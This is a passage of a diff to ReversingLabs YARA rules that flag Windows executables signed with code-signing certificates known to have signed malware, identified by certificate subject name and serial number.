+rule REVERSINGLABS_Cert_Blocklist_Ac0A7B9420B369Af3Ddb748385B981 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5c028a6c-890c-54f1-aea2-ac04ce654907"
+		id = "82d6c0f5-80d1-5003-a5c9-9eadd9654460"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13638-L13654"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7670-L7688"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2099c508d1fd986f34f14aa396a5aaa136e2cdd2226099acdca9c14f6f6342eb"
+		logic_hash = "2bc31eaa64be487cb85873a64b7462d90d1c28839def070ce5db7ae555383421"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25253,21 +47647,21 @@ rule REVERSINGLABS_Cert_Blocklist_22E2A66E63B8Cb4Ec6989Bf7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sivi Technology Limited" and pe.signatures [ i ] . serial == "22:e2:a6:6e:63:b8:cb:4e:c6:98:9b:f7" and 1466995365 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Tochka" and ( pe.signatures [ i ] . serial == "00:ac:0a:7b:94:20:b3:69:af:3d:db:74:83:85:b9:81" or pe.signatures [ i ] . serial == "ac:0a:7b:94:20:b3:69:af:3d:db:74:83:85:b9:81" ) and 1604620800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_654B406De388Ec2Aec253Ff2Ba4C4Bbd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C167F04B338B1E8747B92C2197403C43 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9820112d-d59b-57e7-ae78-7b427f70d529"
+		id = "0bf561ac-0283-557f-a685-4603e2b58273"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13656-L13672"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7690-L7708"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a1aadaded55c8b0d85ac09ba9ab27fefaeec2969cdabaf26ff0c41bf33422ddc"
+		logic_hash = "8e0a11efc739baefe23a3d77e4eefc9dc23c74821c91fc219822dbc5dbb468b1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25277,21 +47671,21 @@ rule REVERSINGLABS_Cert_Blocklist_654B406De388Ec2Aec253Ff2Ba4C4Bbd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yijiajian (Amoy) Jiankan Tech Co.,LTD." and pe.signatures [ i ] . serial == "65:4b:40:6d:e3:88:ec:2a:ec:25:3f:f2:ba:4c:4b:bd" and 1398902400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTUNE STAR TRADING, INC." and ( pe.signatures [ i ] . serial == "00:c1:67:f0:4b:33:8b:1e:87:47:b9:2c:21:97:40:3c:43" or pe.signatures [ i ] . serial == "c1:67:f0:4b:33:8b:1e:87:47:b9:2c:21:97:40:3c:43" ) and 1604361600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_78D1817Ebcf338B4E9C810F9740A726B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9272607Cfc982B782A5D36C4B78F5E7B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3d0a97a4-c45a-5238-a287-867529b470cb"
+		id = "e3ad8f20-d12f-54e9-a6da-7aad28a10287"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13674-L13690"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7710-L7728"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "62e59130ef0ac35b17a265bb8bc2031cac6a75c11925ccb21eb4601b8fbe1a63"
+		logic_hash = "2b1d6f27fb513542589a5c9011e501a9d298282bba6882eac0fc7bf3e6ebb291"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25301,21 +47695,21 @@ rule REVERSINGLABS_Cert_Blocklist_78D1817Ebcf338B4E9C810F9740A726B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CONSTRUTORA NOVO PARQUE LTDA - ME" and pe.signatures [ i ] . serial == "78:d1:81:7e:bc:f3:38:b4:e9:c8:10:f9:74:0a:72:6b" and 1431734400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rada SP Z o o" and ( pe.signatures [ i ] . serial == "00:92:72:60:7c:fc:98:2b:78:2a:5d:36:c4:b7:8f:5e:7b" or pe.signatures [ i ] . serial == "92:72:60:7c:fc:98:2b:78:2a:5d:36:c4:b7:8f:5e:7b" ) and 1605139200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_45Fbcdb1Fbd3D702Fb77257B45D8C58E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_45Eb9187A2505D8E6C842E6D366Ad0C8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6bfd7c1d-2608-5ca0-8e1e-04c73588895a"
+		id = "1b8390aa-16b9-558b-aee8-e30fc7100af4"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13692-L13708"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7730-L7746"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "441e10f49515d75ee9e8983ba4321377fee13a91ca5eeddc08b393136ce8ccfd"
+		logic_hash = "4ae755e814ae2488d4bd6b8136ab6d78e4809a2ddacb7f88cf1d2b64c1488898"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25325,21 +47719,21 @@ rule REVERSINGLABS_Cert_Blocklist_45Fbcdb1Fbd3D702Fb77257B45D8C58E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ding Ruan" and pe.signatures [ i ] . serial == "45:fb:cd:b1:fb:d3:d7:02:fb:77:25:7b:45:d8:c5:8e" and 1476662400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BAKERA s.r.o." and pe.signatures [ i ] . serial == "45:eb:91:87:a2:50:5d:8e:6c:84:2e:6d:36:6a:d0:c8" and 1607040000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4B5D8Ed5Ca011679F141F124 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_56Fff139Df5Ae7E788E5D72196Dd563A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c8bc0968-29d0-51a9-8cfe-7c8f447cef3d"
+		id = "4f34fd37-908c-573c-ba53-5ab622589e88"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13710-L13726"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7748-L7764"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "39ff0d5fd711524ce181596033d1d51579cd086eb20b87722aebf39623bbaa17"
+		logic_hash = "4b58c83901605d8b43519f1bc2d4ac8dc10c794f027681378b2bee2a8ff81604"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25349,21 +47743,21 @@ rule REVERSINGLABS_Cert_Blocklist_4B5D8Ed5Ca011679F141F124 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "4b:5d:8e:d5:ca:01:16:79:f1:41:f1:24" and 1480644725 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cifromatika LLC" and pe.signatures [ i ] . serial == "56:ff:f1:39:df:5a:e7:e7:88:e5:d7:21:96:dd:56:3a" and 1606435200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_33671F1Bcbd0F5E231Fc386F4895000E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E161F76Da3B5E4623892C8E6Fda1Ea3D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0863e1ed-7b9c-5a60-82ac-eadc3c23fbd9"
+		id = "386c81ef-87aa-514e-81d7-dddfb90e0dc2"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13728-L13744"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7766-L7784"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9199c8d76e3390ec9038808b4e88b803b3f3d6966af6206d0c9968d9ab673f31"
+		logic_hash = "883545593b48aa11c11f7fa1a1f77c62321ea86067f1ed108dcd00c8c6cd3495"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25373,21 +47767,21 @@ rule REVERSINGLABS_Cert_Blocklist_33671F1Bcbd0F5E231Fc386F4895000E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALAIS, OOO" and pe.signatures [ i ] . serial == "33:67:1f:1b:cb:d0:f5:e2:31:fc:38:6f:48:95:00:0e" and 1491868800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TGN Nedelica d.o.o." and ( pe.signatures [ i ] . serial == "00:e1:61:f7:6d:a3:b5:e4:62:38:92:c8:e6:fd:a1:ea:3d" or pe.signatures [ i ] . serial == "e1:61:f7:6d:a3:b5:e4:62:38:92:c8:e6:fd:a1:ea:3d" ) and 1604966400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_32Bc299F0694C19Ec21E71265B1D7E17 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9Ae5B177Ac3A7Ce2Aadf1C891B574924 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fa2302c3-4002-5bf0-812b-45298abbda8d"
+		id = "c72b8b2a-3e49-5ac3-ab4d-55b86ce7f061"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13746-L13762"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7786-L7804"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cb522e3084d382c451a8b040095e75582675f90dbb588e370f2f0054f4c2d14b"
+		logic_hash = "03ac299459a1aaf2e4a2e62884cd321e16100fee78b4b0e271acdd8a4e32525c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25397,21 +47791,21 @@ rule REVERSINGLABS_Cert_Blocklist_32Bc299F0694C19Ec21E71265B1D7E17 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "32:bc:29:9f:06:94:c1:9e:c2:1e:71:26:5b:1d:7e:17" and 1474416000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Kolorit" and ( pe.signatures [ i ] . serial == "00:9a:e5:b1:77:ac:3a:7c:e2:aa:df:1c:89:1b:57:49:24" or pe.signatures [ i ] . serial == "9a:e5:b1:77:ac:3a:7c:e2:aa:df:1c:89:1b:57:49:24" ) and 1608076800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7B75C6B0A09Afdb9787F6Dff75Ae7844 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_A03Ea3A4Fa772B17037A0B80F1F968Aa : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0b34c7ce-fa75-5340-a473-fa87fab93b86"
+		id = "cbc0c6ca-fab2-531e-b368-4d3fdc72509f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13764-L13780"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7806-L7824"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8fd125a526b3433fbb8a5c6fa74ce0b0e2de8ff789880c355625d4140cd902a2"
+		logic_hash = "e2044c6ddb80f3add13dfc3b623d0460ce8e9a66c5a98582f80d906edbbbd829"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25421,21 +47815,21 @@ rule REVERSINGLABS_Cert_Blocklist_7B75C6B0A09Afdb9787F6Dff75Ae7844 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "7b:75:c6:b0:a0:9a:fd:b9:78:7f:6d:ff:75:ae:78:44" and 1476662400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DREVOKAPITAL, s.r.o." and ( pe.signatures [ i ] . serial == "00:a0:3e:a3:a4:fa:77:2b:17:03:7a:0b:80:f1:f9:68:aa" or pe.signatures [ i ] . serial == "a0:3e:a3:a4:fa:77:2b:17:03:7a:0b:80:f1:f9:68:aa" ) and 1608076800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_167Fd1295B3Bb102Dbb37292C838E7Cd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_333Ca7D100B139B0D9C1A97Cb458E226 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "42cf5f07-4c43-567c-a517-42c898658ab8"
+		id = "c2c32499-4b0d-51ad-a10e-1ddd7218df84"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13782-L13798"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7826-L7842"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1cc7d441291fd9c4dc37320d411f94fb362523d47d37ab35c20b3ac9d4cd75cb"
+		logic_hash = "b3a31a54132fd8ca2c11b7806503207a4197f16af78693387bac56879b5e1448"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25445,21 +47839,21 @@ rule REVERSINGLABS_Cert_Blocklist_167Fd1295B3Bb102Dbb37292C838E7Cd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "16:7f:d1:29:5b:3b:b1:02:db:b3:72:92:c8:38:e7:cd" and 1476921600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FSE, d.o.o." and pe.signatures [ i ] . serial == "33:3c:a7:d1:00:b1:39:b0:d9:c1:a9:7c:b4:58:e2:26" and 1608076800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_253Ad25E39Abe8F8Fda9Fcf6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9245D1511923F541844Faa3C6Bfebcbe : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f09ca101-dd40-54d8-9235-1faf1e774dd4"
+		id = "7d4033b8-da1d-55f5-aa80-f96636650633"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13800-L13816"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7844-L7862"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1d46ccaa136cd7be30ffbf0eb09eb6485c543ff4bdbe99fa7ea3846841cbd41b"
+		logic_hash = "b965e897b42c39841e663cc144cf6e4a81fc9bcb64ce3a15a7ca021e95866b08"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25469,21 +47863,21 @@ rule REVERSINGLABS_Cert_Blocklist_253Ad25E39Abe8F8Fda9Fcf6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DVERI FADO, TOV" and pe.signatures [ i ] . serial == "25:3a:d2:5e:39:ab:e8:f8:fd:a9:fc:f6" and 1538662130 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LEHTEH d.o.o., Ljubljana" and ( pe.signatures [ i ] . serial == "00:92:45:d1:51:19:23:f5:41:84:4f:aa:3c:6b:fe:bc:be" or pe.signatures [ i ] . serial == "92:45:d1:51:19:23:f5:41:84:4f:aa:3c:6b:fe:bc:be" ) and 1607040000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A9C1523Cb2C73A82771D318124963E87 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2888Cf0F953A4A3640Ee4Cfc6304D9D4 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b21365d0-eaff-51da-8b8e-6a6ee75a5b95"
+		id = "75ec52c5-4c59-51d8-bd9b-928c75d3521a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13818-L13836"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7864-L7880"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "87e314d14361f56935b7a8fb93468cfaf2c73e16c25d68a61ec80ad9334d3115"
+		logic_hash = "a9ee8534d89b8ac8705bb1777718513a28e4531ed398f482f46a72f2760af161"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25493,21 +47887,21 @@ rule REVERSINGLABS_Cert_Blocklist_A9C1523Cb2C73A82771D318124963E87 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ULTERA" and ( pe.signatures [ i ] . serial == "00:a9:c1:52:3c:b2:c7:3a:82:77:1d:31:81:24:96:3e:87" or pe.signatures [ i ] . serial == "a9:c1:52:3c:b2:c7:3a:82:77:1d:31:81:24:96:3e:87" ) and 1499731200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lotte Schmidt" and pe.signatures [ i ] . serial == "28:88:cf:0f:95:3a:4a:36:40:ee:4c:fc:63:04:d9:d4" and 1608024974 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_68E1B2C210B19Bb1F2A24176709B165B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C8Edcfe8Be174C2F204D858C5B91Dea5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e17bf185-3dfc-5a2f-a87f-525ac0e4084b"
+		id = "92baa26f-1352-53ed-bb9f-0a632e471dd5"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13838-L13854"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7882-L7900"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8e88ad992c58d37ff1ac34e2d9cf121f3bc692ae78c0ad79140974abdec2f317"
+		logic_hash = "b3e6927abfce69548374bfd430a3ae3a1c5a8d05f0f40e43091b4d12025c5b1a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25517,21 +47911,21 @@ rule REVERSINGLABS_Cert_Blocklist_68E1B2C210B19Bb1F2A24176709B165B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "68:e1:b2:c2:10:b1:9b:b1:f2:a2:41:76:70:9b:16:5b" and 1474502400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Paarcopy Oy" and ( pe.signatures [ i ] . serial == "00:c8:ed:cf:e8:be:17:4c:2f:20:4d:85:8c:5b:91:de:a5" or pe.signatures [ i ] . serial == "c8:ed:cf:e8:be:17:4c:2f:20:4d:85:8c:5b:91:de:a5" ) and 1608076800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5C88313Bd98Bde99C9B9Ac1408A63249 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9Faf8705A3Eaef9340800Cc4Fd38597C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5108fa8f-3fe6-518c-9bae-b1c44a0ec7a8"
+		id = "d2988928-4ef3-56bf-a407-f735756c7f81"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13856-L13872"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7902-L7920"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f958e46e00bf4ab8ecf071502bcda63a84265029bc9c72cea1eaaf72e9003a84"
+		logic_hash = "66a340f169e401705ba229d2d4548cef1a57bf1d2d320b108d12b2049b063b92"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25541,21 +47935,21 @@ rule REVERSINGLABS_Cert_Blocklist_5C88313Bd98Bde99C9B9Ac1408A63249 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "5c:88:31:3b:d9:8b:de:99:c9:b9:ac:14:08:a6:32:49" and 1474243200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tekhnokod LLC" and ( pe.signatures [ i ] . serial == "00:9f:af:87:05:a3:ea:ef:93:40:80:0c:c4:fd:38:59:7c" or pe.signatures [ i ] . serial == "9f:af:87:05:a3:ea:ef:93:40:80:0c:c4:fd:38:59:7c" ) and 1605744000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7A632A6Ecfc6C49Ec1F42F76 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0940Fa9A4080F35052B2077333769C2F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "863a109c-034f-5168-9470-8fd4945e6e92"
+		id = "358391b7-649b-5792-b4bd-d97b388c5d12"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13874-L13890"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7922-L7938"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "038badeab61c00476b79684308bf91f8a63716641f2be16fe0a3b25ebd3a9a1e"
